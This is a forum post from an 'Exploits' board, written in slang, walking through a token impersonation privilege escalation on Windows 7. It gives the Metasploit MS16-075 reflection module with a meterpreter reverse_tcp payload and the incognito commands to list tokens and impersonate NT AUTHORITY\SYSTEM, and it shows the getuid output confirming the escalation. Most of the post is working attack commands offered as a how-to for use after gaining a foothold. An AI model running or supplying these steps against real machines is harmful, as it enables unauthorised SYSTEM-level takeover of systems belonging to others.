Token Impersonation Attack - Privilege Escalation

Exploiting
Post Reply
User avatar
ltx_Lazzarus
Posts: 55
Joined: Tue Apr 09, 2024 8:05 pm

Token Impersonation Attack - Privilege Escalation

Postby ltx_Lazzarus » Fri May 03, 2024 8:44 pm

Token Impersonation
Some buggers might try to copy and pretend to be another bloke's token to get more power and sneak past the security checks. A cheeky one can make a new access token that's the same as an existing one using DuplicateToken(Ex). Then they can use ImpersonateLoggedOnUser to make the calling thread act like a logged-on user's security thingy.

In this how-to, we'll be having a go at doing a token impersonation attack.

For this part, our target system will be runnin' Windows 7. Before we start, make sure you've already got your foot in the door on the system and have a meterpreter session goin'.

Let's get stuck into it by followin' these steps:

First up, we need to find any weak spots that can be exploited through the Potato attack. We can do this by usin' the Windows Exploit Suggester script:

Code: Select all

./windows-exploit-suggester.py --database <DATABASE.XLSX> --systeminfo <SYSTEMINFO.TXT>

After runnin' that script, we can spot a token impersonation weak spot. Lookin' into the MS16-075 vulnerability, we find a Metasploit module that can do the token impersonation attack automatically.

To load the module in Metasploit, run this:

Code: Select all

msf> use exploit/windows/local/ms16_075_reflection

Once it's loaded, you gotta set the module options. Do that by runnin' these commands:

Code: Select all

msf> set payload /windows/x64/meterpreter/reverse_tcp

Code: Select all

msf> set SESSION <SESSION-ID>

Now we're ready to run the module. Just type this:

Code: Select all

msf> run

Alright, next up we gotta do the impersonation bit. We can do that by loadin' the incognito module on the meterpreter. Just run this command:

Code: Select all

meterpreter> load incognito

Now we can use incognito to list all the tokens we can impersonate. Run this:

Code: Select all

meterpreter> list_tokens -u

Have a look at that, we can see the "NT AUTHORITY\SYSTEM" token there. Ripper!

Alright, let's impersonate that "NT AUTHORITY\SYSTEM" token. Run this command:

Code: Select all

meterpreter> impersonate_token “NT AUTHORITY\SYSTEM”

Now let's check that we've got those sweet, sweet elevated privileges. Run this in the meterpreter:

Code: Select all

meterpreter> getuid

Boom, just like that we've successfully jacked up our access!
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
stopthe4ttack.box
Top
Post Reply

Return to “Exploits”